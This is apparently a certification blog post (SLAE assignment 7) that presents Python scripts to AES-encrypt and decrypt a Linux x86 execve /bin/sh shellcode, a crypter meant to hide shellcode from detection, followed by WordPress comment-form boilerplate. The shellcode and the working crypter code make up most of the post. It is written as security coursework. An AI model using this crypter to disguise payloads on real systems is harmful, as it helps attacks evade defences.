SLAE Assignment 7: Crypter

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption.

Here is the code for encryption:

encode.py

from Crypto.Cipher import AES

plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')
l=len(plain)
r=l%16
p=16-r
print "offset: " + str(p)
plain = plain+"A"*p
ciph=obj.encrypt(plain)
encoded=""
for x in bytearray(ciph):
	encoded += '\\x'
	enc = '%02x' % x
	encoded += enc  
	
print encoded

The output shows first the offset, that is needed to encrypt the shellcode properly. This is needed later in the decryption code.

The offset and the encrypted shellcode have to be adapted in the decryption code. And here is the decryption code:

decode.py

from Crypto.Cipher import AES

offset=7
ciph=("\x2c\x5a\xd5\x5f\x2d\x16\xb6\xb9\x68\x30\x90\x9f\xc9\x6d\xa5\x45\x8a\x08\x01\x2e\xe6\x60\x5b\x9f\x23\xb4\xc5\xaa\x77\x0f\x8a\x7f")

obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')
t=obj.decrypt(ciph)
decoded=""
for x in bytearray(t) :
	decoded += '\\x'
	enc = '%02x' % (x & 0xff)
	decoded += enc	
	
print decoded[0:-offset*4]

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s